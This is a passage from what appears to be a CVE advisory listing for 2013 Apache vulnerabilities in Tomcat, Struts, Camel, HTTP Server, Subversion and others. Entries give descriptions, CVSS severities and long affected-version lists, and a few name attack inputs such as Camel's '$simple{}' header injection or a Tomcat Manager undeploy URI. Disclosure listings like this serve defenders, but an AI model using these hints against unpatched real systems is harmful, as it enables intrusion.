apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 5.5.23
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.35
apache tomcat 5.5.13
apache tomcat 5.5.8
apache tomcat 3.3.1a
apache tomcat 5.0.0
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 3.3.2
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 7.0.36
apache tomcat 5.0.26
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 5.0.12
apache tomcat 5.0.30
apache tomcat 6.0.13
apache tomcat 3.2.3
apache tomcat *
apache tomcat 5.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 5.0.29
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 6
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 5.5.2
apache tomcat 4.1.0
apache tomcat 7.0.27
apache tomcat 5.0.11
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 5.5.31
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 3.3.1
apache tomcat 4.1.2
apache tomcat 5.5.34
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 8.0.0
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 3.2
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 3.3
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 5.0.13
apache tomcat 7.0.41
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 3.1.1
apache tomcat 5.5.9
apache tomcat 7.0.31
apache tomcat 3.2.1
apache tomcat 4.0.1
apache tomcat 6.0.15
apache tomcat 5.5.32
apache tomcat 5.5.1
apache tomcat 7.0.17
apache tomcat 5.5.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 5
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 4
apache tomcat 6.0.17
apache tomcat 7.0.25
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 5.0.21
apache tomcat 7.0.23
apache tomcat 7.0.19
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 5.0.25
apache tomcat 5.0.10
apache tomcat 4.0.6
apache tomcat 7.0.20
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 7.0.14
apache tomcat 7.0.10
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 3.2.2
apache tomcat 3.1
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 3.2.4
apache tomcat 5.0.18
apache tomcat 7.0.22
apache tomcat 5.0.1
apache tomcat 6.0.35
CVE-2013-4295 MEDIUM

The gadget renderer in Apache Shindig 2.5.0 for PHP allows remote attackers to obtain sensitive information via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache shindig 2.5.0
CVE-2013-4310 MEDIUM

Apache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass access controls via a crafted action: prefix.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.3.4.1
apache struts 2.0.9
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.3.14.1
apache struts 2.0.11
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.0.8
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.3.4
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.0.3
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.0.12
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.0.14
apache struts 2.3.1.2
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.2.3
CVE-2013-4316 HIGH

Apache Struts 2.0.0 through 2.3.15.1 enables Dynamic Method Invocation by default, which has unknown impact and attack vectors.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-16,CWE-284,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts 2.0.2
oracle webcenter_sites 11.1.1.6.1
apache struts 2.0.9
apache struts 2.3.14.1
oracle flexcube_private_banking 12.0.1
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
oracle flexcube_private_banking 12.0.2
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.1.8
apache struts 2.0.13
oracle flexcube_private_banking 2.2.0.1
oracle flexcube_private_banking 1.7
apache struts 2.0.12
apache struts 2.0.14
oracle flexcube_private_banking 3.0
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
oracle flexcube_private_banking 2.0
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
oracle mysql_enterprise_monitor *
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
oracle flexcube_private_banking 2.0.1
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
oracle webcenter_sites 11.1.1.8.0
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.1.2
apache struts 2.2.3
CVE-2013-4317 MEDIUM

In Apache CloudStack 4.1.0 and 4.1.1, when calling the CloudStack API call listProjectAccounts as a regular, non-administrative user, the user is able to see information for accounts other than their own.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache cloudstack 4.1.0
apache cloudstack 4.1.1
CVE-2013-4322 MEDIUM

Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-RC10 processes chunked transfer coding without properly handling (1) a large total amount of chunked data or (2) whitespace characters in an HTTP header value within a trailer field, which allows remote attackers to cause a denial of service by streaming data. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-3544.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 4.1.29
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 5.0.5
apache tomcat 1.1.3
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 7.0.44
apache tomcat 6.0.29
apache tomcat 4.0.3
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 7.0.33
apache tomcat 3.0
apache tomcat 6.0.36
apache tomcat 5.0.23
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 5.5.23
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.35
apache tomcat 5.5.13
apache tomcat 5.5.8
apache tomcat 3.3.1a
apache tomcat 5.0.0
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 3.3.2
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 7.0.36
apache tomcat 5.0.26
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 5.0.12
apache tomcat 5.0.30
apache tomcat 6.0.13
apache tomcat 3.2.3
apache tomcat *
apache tomcat 5.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 5.0.29
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 6
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 5.5.2
apache tomcat 4.1.0
apache tomcat 7.0.27
apache tomcat 5.0.11
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 5.5.31
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 3.3.1
apache tomcat 4.1.2
apache tomcat 5.5.34
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 8.0.0
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 3.2
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 3.3
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 5.0.13
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 3.1.1
apache tomcat 5.5.9
apache tomcat 7.0.31
apache tomcat 3.2.1
apache tomcat 4.0.1
apache tomcat 6.0.15
apache tomcat 5.5.32
apache tomcat 5.5.1
apache tomcat 7.0.17
apache tomcat 5.5.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 5
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 4
apache tomcat 6.0.17
apache tomcat 7.0.25
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 5.0.21
apache tomcat 7.0.23
apache tomcat 7.0.19
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 5.0.25
apache tomcat 5.0.10
apache tomcat 4.0.6
apache tomcat 7.0.20
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 7.0.14
apache tomcat 7.0.10
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 3.2.2
apache tomcat 3.1
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 3.2.4
apache tomcat 5.0.18
apache tomcat 7.0.22
apache tomcat 5.0.1
apache tomcat 6.0.35
CVE-2013-4330 MEDIUM

Apache Camel before 2.9.7, 2.10.0 before 2.10.7, 2.11.0 before 2.11.2, and 2.12.0 allows remote attackers to execute arbitrary simple language expressions by including "$simple{}" in a CamelFileName message header to a (1) FILE or (2) FTP producer.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache camel 1.6.2
apache camel 2.9.4
apache camel 2.9.5
apache camel 2.10.1
apache camel 2.8.4
apache camel 2.6.0
apache camel 2.10.4
apache camel 2.8.6
apache camel 1.6.1
apache camel 2.7.1
apache camel 2.9.1
apache camel 2.4.0
apache camel 2.8.0
apache camel 2.0.0
apache camel 2.9.0
apache camel 2.8.3
apache camel 2.10.3
apache camel 1.0.0
apache camel 2.1.0
apache camel 1.4.0
apache camel 1.1.0
apache camel 2.3.0
apache camel 2.11.1
apache camel 2.7.0
apache camel 1.2.0
apache camel 2.10.2
apache camel 2.8.2
apache camel 2.7.5
apache camel 2.7.4
apache camel 2.2.0
apache camel 1.6.0
apache camel 1.5.0
apache camel 1.3.0
apache camel 2.7.2
apache camel 2.5.0
apache camel *
apache camel 2.7.3
apache camel 2.10.5
apache camel 2.11.0
apache camel 2.12.0
apache camel 2.9.2
apache camel 2.10.0
apache camel 2.8.5
apache camel 1.6.4
apache camel 2.10.6
apache camel 1.6.3
apache camel 2.8.1
apache camel 2.9.3
CVE-2013-4352 MEDIUM

The cache_invalidate function in modules/cache/cache_storage.c in the mod_cache module in the Apache HTTP Server 2.4.6, when a caching forward proxy is enabled, allows remote HTTP servers to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger a missing hostname value.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.4.6
CVE-2013-4365 HIGH

Heap-based buffer overflow in the fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.9 for the Apache HTTP Server allows remote attackers to have an unspecified impact via unknown vectors.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
opensuse opensuse 12.3
opensuse opensuse 11.4
debian debian_linux 6.0
suse linux_enterprise_software_development_kit 11
debian debian_linux 7.0
opensuse opensuse 12.2
apache mod_fcgid *
suse cloud 1.0
suse cloud 2.0
CVE-2013-4366 HIGH

http/impl/client/HttpClientBuilder.java in Apache HttpClient 4.3.x before 4.3.1 does not ensure that X509HostnameVerifier is not null, which allows attackers to have unspecified impact via vectors involving hostname verification.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache httpclient 4.3
CVE-2013-4390 MEDIUM

Open redirect vulnerability in the AbstractAuthenticationFormServlet in the Auth Core (org.apache.sling.auth.core) bundle before 1.1.4 in Apache Sling allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the resource parameter, related to "a custom login form and XSS."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache sling_auth_core_component 1.0.4
apache sling *
apache sling_auth_core_component 1.0.2
apache sling_auth_core_component 1.1.0
apache sling_auth_core_component *
apache sling_auth_core_component 1.0.6
CVE-2013-4444 MEDIUM

Unrestricted file upload vulnerability in Apache Tomcat 7.x before 7.0.40, in certain situations involving outdated java.io.File code and a custom JMX configuration, allows remote attackers to execute arbitrary code by uploading and accessing a JSP file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 7.0.13
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat *
apache tomcat 7.0.19
apache tomcat 7.0.18
apache tomcat 7.0.29
apache tomcat 7.0.12
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 7.0.20
apache tomcat 7.0.28
apache tomcat 7.0.14
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.31
apache tomcat 7.0.3
apache tomcat 7.0.26
apache tomcat 7.0.27
apache tomcat 7.0.17
apache tomcat 7.0.2
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.22
apache tomcat 7.0.0
apache tomcat 7.0.30
apache tomcat 7.0.32
CVE-2013-4505 LOW

The is_this_legal function in mod_dontdothat for Apache Subversion 1.4.0 through 1.7.13 and 1.8.0 through 1.8.4 allows remote attackers to bypass intended access restrictions and possibly cause a denial of service (resource consumption) via a relative URL in a REPORT request.

CVSS 2.0

Severity: LOW

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache subversion 1.4.0
apache subversion 1.6.18
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache mod_dontdothat -
apache subversion 1.7.4
apache subversion 1.5.6
apache subversion 1.6.17
apache subversion 1.4.3
apache subversion 1.6.20
apache subversion 1.7.5
apache subversion 1.6.12
apache subversion 1.6.13
apache subversion 1.7.12
apache subversion 1.6.3
apache subversion 1.6.5
apache subversion 1.5.8
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.7.3
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.5.7
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.5.2
apache subversion 1.8.1
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.9
apache subversion 1.7.6
apache subversion 1.6.19
apache subversion 1.7.9
apache subversion 1.5.4
apache subversion 1.6.23
apache subversion 1.4.2
apache subversion 1.4.6
apache subversion 1.7.1
apache subversion 1.4.5
apache subversion 1.6.7
apache subversion 1.4.4
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.6.1
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.4.1
CVE-2013-4517 MEDIUM

Apache Santuario XML Security for Java before 1.5.6, when applying Transforms, allows remote attackers to cause a denial of service (memory consumption) via crafted Document Type Definitions (DTDs), related to signatures.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache santuario_xml_security_for_java 1.2.0
apache santuario_xml_security_for_java 1.2.1
apache santuario_xml_security_for_java *
apache santuario_xml_security_for_java 1.5.2
apache santuario_xml_security_for_java 1.4.4
apache santuario_xml_security_for_java 1.4.8
apache santuario_xml_security_for_java 1.4.3
apache santuario_xml_security_for_java 1.4.2
apache santuario_xml_security_for_java 1.4.1
apache santuario_xml_security_for_java 1.5.3
apache santuario_xml_security_for_java 1.4.0
apache santuario_xml_security_for_java 1.4.5
apache santuario_xml_security_for_java 1.3.0
apache santuario_xml_security_for_java 1.4.6
apache santuario_xml_security_for_java 1.5.1
apache santuario_xml_security_for_java 1.4.7
apache santuario_xml_security_for_java 1.5.4
apache santuario_xml_security_for_java 1.5.0
CVE-2013-4558 LOW

The get_parent_resource function in repos.c in mod_dav_svn Apache HTTPD server module in Subversion 1.7.11 through 1.7.13 and 1.8.1 through 1.8.4, when built with assertions enabled and SVNAutoversioning is enabled, allows remote attackers to cause a denial of service (assertion failure and Apache process abort) via a non-canonical URL in a request, as demonstrated using a trailing /.

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache subversion 1.7.11
apache subversion 1.7.12
apache subversion 1.8.2
apache subversion 1.8.3
apache subversion 1.8.4
apache subversion 1.7.13
apache mod_dav_svn -
apache subversion 1.8.1
CVE-2013-4590 MEDIUM

Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-RC10 allows attackers to obtain "Tomcat internals" information by leveraging the presence of an untrusted web application with a context.xml, web.xml, *.jspx, *.tagx, or *.tld XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 4.1.29
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 5.0.5
apache tomcat 1.1.3
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 7.0.44
apache tomcat 6.0.29
apache tomcat 4.0.3
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 7.0.33
apache tomcat 3.0
apache tomcat 6.0.36
apache tomcat 5.0.23
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 5.5.23
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.35
apache tomcat 5.5.13
apache tomcat 5.5.8
apache tomcat 3.3.1a
apache tomcat 5.0.0
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 3.3.2
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 7.0.36
apache tomcat 5.0.26
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 5.0.12
apache tomcat 5.0.30
apache tomcat 6.0.13
apache tomcat 3.2.3
apache tomcat *
apache tomcat 5.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 5.0.29
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 6
apache tomcat 7.0.1
apache tomcat 7.0.45
debian debian_linux 7.0
apache tomcat 5.5.2
apache tomcat 4.1.0
apache tomcat 7.0.27
apache tomcat 5.0.11
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 5.5.31
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 3.3.1
apache tomcat 4.1.2
apache tomcat 5.5.34
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 8.0.0
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 3.2
oracle solaris 11.2
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 3.3
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 5.0.13
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 3.1.1
apache tomcat 5.5.9
apache tomcat 7.0.31
apache tomcat 3.2.1
apache tomcat 4.0.1
apache tomcat 6.0.15
apache tomcat 5.5.32
apache tomcat 5.5.1
apache tomcat 7.0.17
apache tomcat 5.5.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 5.5.3
apache tomcat 5
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 4
apache tomcat 6.0.17
apache tomcat 7.0.25
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 5.0.21
apache tomcat 7.0.23
apache tomcat 7.0.19
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 5.0.25
apache tomcat 5.0.10
apache tomcat 4.0.6
apache tomcat 7.0.20
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 7.0.14
apache tomcat 7.0.10
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 3.2.2
apache tomcat 3.1
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 3.2.4
apache tomcat 5.0.18
apache tomcat 7.0.22
apache tomcat 5.0.1
apache tomcat 6.0.35
CVE-2013-5704 MEDIUM

The mod_headers module in the Apache HTTP Server 2.2.22 allows remote attackers to bypass "RequestHeader unset" directives by placing a header in the trailer portion of data sent with chunked transfer coding. NOTE: the vendor states "this is not a security issue in httpd as such."

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server 2.4.7
redhat enterprise_linux_server_aus 7.4
apache http_server 2.2.19
oracle http_server 11.1.1.7.0
apache http_server 2.2.4
apache http_server 2.2.11
oracle solaris 11.2
oracle http_server 12.1.3.0
apache http_server 2.4.3
apache http_server 2.4.10
redhat enterprise_linux_server 6.0
apache http_server 2.2.0
apache http_server 2.2.16
redhat jboss_enterprise_web_server 3.0.0
oracle enterprise_manager_ops_center 12.2.1
apache http_server 2.2.26
apache http_server 2.2.12
oracle http_server 12.1.2.0
oracle linux 6
apple mac_os_x *
apache http_server 2.2.23
redhat enterprise_linux_eus 7.3
apache http_server 2.2.13
redhat enterprise_linux_eus 7.5
apache http_server 2.4.6
apache http_server 2.2.8
redhat enterprise_linux_desktop 6.0
redhat enterprise_linux_server_tus 7.7
oracle enterprise_manager_ops_center 12.3.0
apache http_server 2.2.22
redhat enterprise_linux_workstation 6.0
apache http_server 2.2.3
redhat jboss_enterprise_web_server 2.0.0
canonical ubuntu_linux 14.10
redhat enterprise_linux_server 7.0
apache http_server 2.2.10
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
apache http_server 2.2.17
apache http_server 2.2.27
apache http_server 2.4.2
redhat enterprise_linux_eus 7.6
apache http_server 2.2.2
canonical ubuntu_linux 12.04
redhat enterprise_linux_eus 7.4
apache http_server 2.4.1
apache http_server 2.2.9
apache http_server 2.2.14
oracle enterprise_manager_ops_center 12.2.0
apache http_server 2.2.20
canonical ubuntu_linux 14.04
apache http_server 2.2.5
redhat enterprise_linux_desktop 7.0
apache http_server 2.2.25
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
apple mac_os_x_server *
apache http_server 2.2.6
oracle enterprise_manager_ops_center 12.1.4
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
canonical ubuntu_linux 10.04
apache http_server 2.2.18
apache http_server 2.4.4
redhat enterprise_linux_server_aus 7.7
apache http_server 2.2.15
apache http_server 2.2.21
apache http_server 2.4.9
apache http_server 2.2.24
oracle http_server 10.1.3.5.0
oracle enterprise_manager_ops_center *
CVE-2013-6348 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.3.15.3 allow remote attackers to inject arbitrary web script or HTML via the namespace parameter to (1) actionNames.action and (2) showConfig.action in config-browser/.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts 2.3.15.3
CVE-2013-6357 MEDIUM

Cross-site request forgery (CSRF) vulnerability in the Manager application in Apache Tomcat 5.5.25 and earlier allows remote attackers to hijack the authentication of administrators for requests that manipulate application deployment via the POST method, as demonstrated by a /manager/html/undeploy?path= URI. NOTE: the vendor disputes the significance of this report, stating that "the Apache Tomcat Security team has not accepted any reports of CSRF attacks against the Manager application ... as they require a reckless system administrator."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 4.1.2
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 4.1.29
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 3.2
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 5.0.5
apache tomcat 1.1.3
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 5.0.24
apache tomcat 3.3
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 4.0.3
apache tomcat 5.0.13
apache tomcat 4.1.24
apache tomcat 5.0.28
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 3.1.1
apache tomcat 5.5.9
apache tomcat 3.2.1
apache tomcat 3.0
apache tomcat 5.0.23
apache tomcat 4.0.1
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 3.3.1a
apache tomcat 5
apache tomcat 5.0.0
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 4
apache tomcat 5.5.22
apache tomcat 3.3.2
apache tomcat 5.0.26
